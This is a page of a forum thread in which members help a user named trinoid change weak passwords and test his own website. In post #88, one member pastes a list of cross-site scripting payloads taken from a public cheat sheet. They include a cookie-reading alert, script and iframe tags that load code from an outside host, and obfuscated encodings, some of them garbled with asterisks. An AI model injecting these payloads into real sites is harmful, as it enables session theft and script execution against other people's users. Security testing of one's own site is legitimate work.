mrtg
+ Reply to Thread
Page 6 of 7 FirstFirst ... 4567 LastLast
Results 76 to 90 of 97

Thread: My Site

  1. #76
    Join Date
    Nov 2006
    Posts
    178
    If you have an ebay account i assume you have a paypal account too... don't forget to change that password too. And your myspace password.

  2. #77
    Join Date
    Sep 2006
    Posts
    1,649
    He had his PayPal account's password diferent from the begining.

  3. #78
    Join Date
    Nov 2006
    Posts
    178
    Oh yeah... that's probably right... paypal doesn't allow weak crappy passwords like "puppies"

  4. #79
    Join Date
    Sep 2006
    Posts
    1,649
    Finally trinoid changed his gmail passwords!

  5. #80
    Join Date
    Nov 2006
    Posts
    39
    ya i did changed both passwords and working on the rest

  6. #81
    Join Date
    Nov 2006
    Posts
    178
    Yipeeeee!!

  7. #82
    Join Date
    Sep 2006
    Posts
    1,649
    Well, so ends the adventures of Troll and Moonbat on their quest to help trinoid become security-savy.

  8. #83
    Join Date
    Nov 2006
    Posts
    178
    I hope it's the end

  9. #84
    Join Date
    Sep 2006
    Posts
    1,649
    I'm bored, now what'll we do?

  10. #85
    Join Date
    Nov 2006
    Posts
    178
    I'm bored too...

    Brad- change all your passwords back

  11. #86
    Join Date
    Nov 2006
    Posts
    39

    Thank you

    thank you very much

  12. #87
    Join Date
    Nov 2006
    Posts
    39

    Talking

    ok ok i think that im done nope i need to change one or two more but ty guys this has been fun and i hope that maybee we can be friends and not just you guys like attacking my site lol well ya ok im gunna go finish ill post back on this thread

  13. #88
    Join Date
    Sep 2006
    Posts
    1,649
    Hmm, lemme test for some more xss vulnerablities, other than the one mike found. If they work, a popup should come up

    <img src='john.jpg' onerror='alert(document.cookie)'>

    Here's one I found online

    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

    Another one from the same site
    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

    <IMG SRC=javascript:alert(&quot;XSS&quot>

    Yet again

    <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">

    <IMG SRC=javascript:alert(String.fromCharCode(88,8*,8*))>

    Differnet encodings: should output alert(xss) or whatever

    <IMG SRC=javascript:alert('XSS')>
    <IMG SRC=&#0000*06&#00000*7&#0000**8&#00000*7&#0000**5&#00000**&#0000**4&#0000*05&#0000**2&#0000**6&#0000 058&#00000*7&#0000*08&#0000*0*&#0000**4&#0000**6&#0000040&#00000**&#0000088&#000008*&#000008*&#00000 **&#000004*>

    <IMG SRC=&#x6A&#x6*&#x76&#x6*&#x7*&#x6*&#x72&#x6*&#x70&#x74&#x*A&#x6*&#x6C&#x65&#x72&#x74&#x28&#x27&#x58& #x5*&#x5*&#x27&#x2*>

    <IMG SRC="jav ascript:alert('XSS');">

    Using perl thngy (all from the site)
    perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

    <iframe src=http://ha.ckers.org/scriptlet.html>
    Last edited by Moonbat; 11-28-2006 at 09:56 PM.

  14. #89
    Join Date
    Nov 2006
    Posts
    39
    what is that?

  15. #90
    Join Date
    Sep 2006
    Posts
    1,649
    It can let you run JavaScript commands on a website as if they were coming from the server.

+ Reply to Thread

Similar Threads

  1. Web site
    By Unregistered in forum Proxies and Firewalls
    Replies: 2
    Last Post: 01-13-2005, 06:35 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts